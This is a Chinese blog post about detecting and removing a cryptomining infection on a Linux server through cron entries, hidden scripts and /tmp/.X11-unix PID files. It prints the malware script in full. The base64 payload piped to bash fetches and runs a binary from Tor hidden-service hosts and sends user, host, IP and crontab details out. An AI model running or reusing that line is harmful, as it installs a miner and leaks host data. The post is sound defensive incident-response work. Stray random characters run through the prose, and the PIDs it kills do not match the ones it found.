LINUX解決.systemd-service.sh挖礦程序

LINUX慘遭挖礦

參考:.systemd-service.sh挖礦木馬排查shanbaobin的博客-CSDN博客.systemd-service.sh渔隶,手動(dòng)記錄

top命令查看進(jìn)程缩举,發(fā)現(xiàn)某不知名進(jìn)程占滿cpu平委,導(dǎo)致我很多服務(wù)不可用

top命令查看

先排查crontab:

crontab -l

發(fā)現(xiàn)有個(gè)可疑腳本:/root/.systemd-service.sh

查看一下:

[root@10-9-181-78 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo xeVBa2qNgxz++OO5fCAs7pMTNuXLyOMOvGt6Fhni+jH66NppNT+F7aWttcCLjX9x
echo eGVWQmEycU5neHorK09PNWZDQXM3cE1UTnVYTHlPTU92R3Q2RmhuaStqSDY2TnBwTlQrRjdhV3R0Y0NMalg5eApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJtaGV2a2s0b2RnenFwdDJoYmozaGh3MnV6NHZodW5vbzU1ZXZld3JnbW91eWllaGNhbHRtYnJxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash

很明顯是被加密過,通過base64解密啥繁,獲得如下:

解碼后

發(fā)現(xiàn)可疑文件/tmp/.X11-unix/01荒叶,查看/tmp/.X11-unix目錄下文件內(nèi)容

/tmp/.X11-unix

從內(nèi)容上看是該進(jìn)程的兩個(gè)進(jìn)程ID,ps -ef|grep查看對(duì)應(yīng)進(jìn)程:

查看進(jìn)程號(hào)

查看/etc/hosts文件是否正常输虱,我這里是沒有問題

來到/etc/cron.d/目錄下發(fā)現(xiàn)可疑文件

/etc/cron.d/0systemd-service內(nèi)容

這個(gè)指令指向/opt/目錄下的systemd-service.sh,繼續(xù)追蹤:

依舊是加密過的

解密:

沒啥新鮮的內(nèi)容

至此:我們找到了

2個(gè)可疑定時(shí)任務(wù)分布在:crontab脂凶、/etc/cron.d/0systemd-service

2個(gè)可疑文件分布在:/root/.systemd-service.sh宪睹、/opt/systemd-service.sh

2個(gè)可疑進(jìn)程PID:9332、21602

針對(duì)上邊的問題進(jìn)行處理:

  1. 清空.ssh/known_hosts里面可疑的公鑰
  2. 清理crontab蚕钦、刪除/etc/cron.d/0systemd-service
  3. 刪除/root/.systemd-service.sh亭病、/opt/systemd-service.sh
  4. 殺掉2784024、3234955

注意:遇到這種挖礦木馬一定要徹底清理干凈嘶居,否則它就像小強(qiáng)一樣打不死罪帖。之前我只是單純的刪除了定時(shí)任務(wù)和腳本,沒有看腳本里面的內(nèi)容邮屁,導(dǎo)致頻頻復(fù)發(fā)整袁,最后定位到/tmp/.X11-unix/這個(gè)目錄才找到幕后進(jìn)程。一般被植入這種挖礦木馬主要因?yàn)槭悄承┞┒磫栴}佑吝,比如你安裝了redis然后使用redis默認(rèn)配置坐昙,沒有設(shè)置密碼,開放了6379端口芋忿,而你的redis中又有遠(yuǎn)程代碼執(zhí)行的漏洞炸客,那么很容易中招。

我已處理完戈钢,過段時(shí)間看效果痹仙。

經(jīng)過一夜,驗(yàn)證此法有效殉了。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末开仰,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子宣渗,更是在濱河造成了極大的恐慌抖所,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,525評(píng)論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件痕囱,死亡現(xiàn)場(chǎng)離奇詭異田轧,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)鞍恢,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,203評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門傻粘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來每窖,“玉大人,你說我怎么就攤上這事弦悉≈系洌” “怎么了?”我有些...
    開封第一講書人閱讀 164,862評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵稽莉,是天一觀的道長(zhǎng)瀑志。 經(jīng)常有香客問我,道長(zhǎng)污秆,這世上最難降的妖魔是什么劈猪? 我笑而不...
    開封第一講書人閱讀 58,728評(píng)論 1 294
  • 正文 為了忘掉前任,我火速辦了婚禮良拼,結(jié)果婚禮上战得,老公的妹妹穿的比我還像新娘。我一直安慰自己庸推,他們只是感情好常侦,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,743評(píng)論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著贬媒,像睡著了一般聋亡。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上掖蛤,一...
    開封第一講書人閱讀 51,590評(píng)論 1 305
  • 那天杀捻,我揣著相機(jī)與錄音,去河邊找鬼蚓庭。 笑死致讥,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的器赞。 我是一名探鬼主播垢袱,決...
    沈念sama閱讀 40,330評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼港柜!你這毒婦竟也來了请契?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,244評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤夏醉,失蹤者是張志新(化名)和其女友劉穎爽锥,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體畔柔,經(jīng)...
    沈念sama閱讀 45,693評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡氯夷,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,885評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了靶擦。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片腮考。...
    茶點(diǎn)故事閱讀 40,001評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡雇毫,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出踩蔚,到底是詐尸還是另有隱情棚放,我是刑警寧澤,帶...
    沈念sama閱讀 35,723評(píng)論 5 346
  • 正文 年R本政府宣布馅闽,位于F島的核電站飘蚯,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏福也。R本人自食惡果不足惜孝冒,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,343評(píng)論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望拟杉。 院中可真熱鬧,春花似錦量承、人聲如沸搬设。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,919評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽拿穴。三九已至,卻和暖如春忧风,著一層夾襖步出監(jiān)牢的瞬間默色,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,042評(píng)論 1 270
  • 我被黑心中介騙來泰國打工狮腿, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留腿宰,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,191評(píng)論 3 370
  • 正文 我出身青樓缘厢,卻偏偏與公主長(zhǎng)得像吃度,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子贴硫,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,955評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • update: 沒想到一個(gè)我記錄下的備忘會(huì)有朋友關(guān)注椿每,那就更新一下。 1. 有人說代碼顯示不佳英遭,我后來...
    半介一生閱讀 5,934評(píng)論 8 27
  • 一 背景 早上就收到朋友的短信,提示阿里云機(jī)器有惡意病毒執(zhí)行,一般病毒木馬執(zhí)行喜歡用 crontab,所以先看看 ...
    明翼閱讀 1,055評(píng)論 0 1
  • 服務(wù)器又又被挖礦了间护。。挖诸。top 看了一下汁尺,有個(gè) cncq 的進(jìn)程把 CPU 跑滿了。直接上解決過程税灌。 初步分析 c...
    redoca閱讀 1,216評(píng)論 0 2
  • 0x00 前言 當(dāng)企業(yè)發(fā)生黑客入侵均函、系統(tǒng)崩潰或其它影響業(yè)務(wù)正常運(yùn)行的安全事件時(shí)亿虽,急需第一時(shí)間進(jìn)行處理,使企業(yè)的網(wǎng)絡(luò)...
    Bypass007閱讀 684評(píng)論 0 1
  • ansible關(guān)閉ssh首次連接時(shí)yes/no提示 使用ssh連接時(shí)苞也,可以使用-o參數(shù)將StrictHostKey...
    張?chǎng)螡蒧2109閱讀 247評(píng)論 0 0